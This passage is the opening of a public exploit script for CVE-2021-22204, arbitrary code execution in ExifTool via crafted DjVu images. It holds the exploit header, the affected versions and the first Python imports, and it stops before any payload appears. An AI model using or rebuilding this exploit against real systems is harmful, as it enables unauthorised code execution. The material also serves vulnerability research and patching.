# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution# Date: 04/30/2022# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)# Vendor Homepage: https://exiftool.org/# Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip# Version: 7.44-12.23# Tested on: ExifTool 12.23 (Debian)# CVE: CVE-2021-22204# Source: https://github.com/UNICORDev/exploit-CVE-2021-22204# Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image#!/usr/bin/env python3# Importsimport base64import osimport subprocessimport sys# Class for colorsclass color: red = '